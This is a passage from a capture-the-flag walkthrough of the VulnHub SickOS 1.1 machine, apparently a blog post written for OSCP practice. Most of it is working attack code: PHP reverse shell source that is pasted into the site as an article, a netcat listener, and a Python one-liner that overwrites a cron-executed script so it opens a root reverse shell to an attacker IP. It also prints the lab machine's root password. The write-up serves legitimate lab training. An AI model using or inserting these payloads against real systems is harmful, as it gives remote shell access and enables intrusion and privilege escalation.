
//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}

// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}

// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}

// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}

// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}

// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}

// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}

?>

Just make the necessary changes on line 4 and 5 and paste the code as an article as described on the picture above.

Go to the terminal and netcat to the port you are listening to. Refresh the page and you are good to go.

$ nc -nvlp 1234

Getting the www-data access

Voilà, got the www-data access.

Here after looking at the content of config.php, I get to know that the root password is john@123, but I wasn’t able to su into root.

So let’s try out something different.

Here, we again get the connect.py script. Something fishy going on here. And yes I was right, after looking at the crontab of this machine, I get to know that the connect.py script is being executed on every refresh. So, an easier way would be to just replace the content of the script to get a root access reverse shell to the machine.

Now it’s the time for privilege escalation.

Getting root access

echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.162.128",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' > /var/www/connect.py

Simple, well this one I wrote as I am quite good in python. Easy to understand, just a socket connection to our machine through port 4444.

Refresh the webpage!!

And yes finally we got the ROOT privilege.

It was a good experience, and well I tried to go though it manually, without using the Metasploit framework, because according to some YouTube videos, OSCP allows only a limited number of Metasploit sessions, I don’t know I haven’t completed my OSCP yet, well I am trying to prepare for it. So, better to just get a practice of this before it’s too long. And I will reference some blogs which used Metasploit to get the access, really nice to read out them as well. Helped me a lot while getting the idea of privilege escalation.

Thanks for reading!!

Reference

  1. https://www.vulnhub.com/entry/sickos-11,132/
  2. https://jhalon.github.io/vulnhub-sick-os1/
  3. https://medium.com/@uzmakin495/sickos-1-1-walkthrough-vulnhub-286a7f5fcb85
  4. https://medium.com/infosec-adventures/sickos-1-1-walkthrough-8b0f206c5b7a
  5. https://highon.coffee/blog/sickos-1-walkthrough/
  6. https://alphacybersecurity.tech/sickos-1-1-walk-through/
  7. https://mattgeraldcomputingjourney.wordpress.com/2019/12/04/sickos-1-1-walkthrough/

--

--